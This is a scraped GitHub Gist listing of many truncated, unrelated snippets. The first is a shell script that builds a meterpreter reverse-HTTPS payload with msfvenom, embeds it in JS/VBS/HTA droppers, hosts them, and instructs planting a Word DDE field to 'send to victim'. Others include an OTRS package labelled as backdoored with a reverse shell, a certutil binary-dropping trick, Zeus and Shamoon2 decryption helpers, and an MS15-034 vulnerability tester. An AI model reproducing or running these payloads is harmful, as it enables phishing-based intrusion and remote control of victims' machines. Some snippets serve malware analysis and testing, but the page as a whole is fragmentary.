Skip to content

Instantly share code, notes, and snippets.

@xillwillx
xillwillx / CactusTorchDDEAUTO.sh
Last active August 6, 2018 07:25
CactusTorchDDEAUTO
git clone https://github.com/mdsecactivebreach/CACTUSTORCH.git && cd CACTUSTORCH
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
msfvenom -p windows/meterpreter/reverse_https LHOST=$IP LPORT=443 -f raw -o payload.bin
PAYLOAD=$(cat payload.bin | base64 -w 0)
sed -i -e 's|var code = ".*|var code = "'$PAYLOAD'";|' CACTUSTORCH.js
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.vbs
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.hta
cp -t /var/www/html/ CACTUSTORCH.vbs CACTUSTORCH.js CACTUSTORCH.hta
service apache2 start
echo -e "\n\n\n\nOpen Microsoft Word and press CTRL+F9 and copy any of the payloads below in between the { } then save and send to victim.\n\nJS PAYLOAD:\n\
@r00tpgp
r00tpgp / oscp_recon.sh
Last active February 4, 2020 12:52
Some script I found on the web for preparation of my OSCP exam, I modified it to include more functions for enumeration.
#!/bin/bash
###################################################
# Recon Script
#
# Version: v2_08102016
# Created By: Seclyn
# Description: For initial recon of network/hosts.
# Mod by: r00t.pgp
#
###################################################
21:25:59>> aliases
[21:25:59] ID: 331 'aliases' started [target: z0.0.0.1]
acquiretoken : LOCAL : script _AcquireToken.dss %%cmd_args%%
acquiretoken : ANY_REMOTE : script _AcquireToken.dss %%cmd_args%%
arparp : LOCAL : python windows/arparp.py -args " %%cmd_args%% " -project Ops
arparp : ANY_REMOTE : python windows/arparp.py -args " %%cmd_args%% " -project Ops
channels : LOCAL : commands %%cmd_args%%
channels : ANY_REMOTE : commands %%cmd_args%%
checkpsp : LOCAL : python windows/checkpsp.py -args " %%cmd_args%% " -project Ops
checkpsp : ANY_REMOTE : python windows/checkpsp.py -args " %%cmd_args%% " -project Ops
def decrypt(func):
"""
Decryption of zeus strings
"""
ZBOT_INDEX_MIN = 0x0
ZBOT_INDEX_MAX = 0xe7
data = {}
for i in range(ZBOT_INDEX_MIN, ZBOT_INDEX_MAX):
import idc
def decrypt_n_comment(func, func_name):
"""
Decrypt and comment Shamoon2's strings
"""
data = {}
for xref in XrefsTo(LocByName(func_name)):
# init
@mgeeky
mgeeky / MyPackage.opm
Last active July 18, 2024 14:35
OTRS OPM backdoored Package with Reverse Shell
<?xml version="1.0" encoding="utf-8" ?>
<otrs_package version="1.1">
<Name>MyModule</Name>
<Version>1.0.0</Version>
<Vendor>My Module</Vendor>
<URL>http://otrs.org/</URL>
<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>
<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>
<Description Lang="en">MyModule</Description>
<Framework>5.x.x</Framework>
@yocontra
yocontra / kali-install.sh
Last active January 28, 2024 06:33
installing private internet access on kali linux
apt-get install network-manager-openvpn
wget https://www.privateinternetaccess.com/openvpn/openvpn.zip
mv openvpn.zip /etc/openvpn
cd /etc/openvpn
unzip openvpn.zip
rm -rf openvpn.zip
# set up the rest in the gui
# gateway = us-east.privateinternetaccess.com
# CA.crt will be in /etc/openvpn
#!/usr/bin/env python
# Rulz.py
# Author: Nick Landers (@monoxgas) - Silent Break Security
import os
import sys
import argparse
import re
import binascii
import codecs
@mattifestation
mattifestation / drop_binary.bat
Created July 12, 2015 05:49
Drop binary data from the command line w/o needing PowerShell
echo -----BEGIN CERTIFICATE----- > encoded.txt
echo Just Base64 encode your binary data
echo TVoAAA== >> encoded.txt
echo -----END CERTIFICATE----- >> encoded.txt
certutil -decode encoded.txt decoded.bin
@Zagrophyte
Zagrophyte / MS15-034Tester.ps1
Last active April 4, 2021 15:58
Sends a CVE-2015-1635 / MS15-034 Request and checks for vulnerability
# Sends a CVE-2015-1635 / MS15-034 Request and checks for vulnerability
function TestMS15_034($hostname, $port)
{
if ($port -eq $null)
{
$port = 80
}
$tc = New-Object Net.Sockets.TcpClient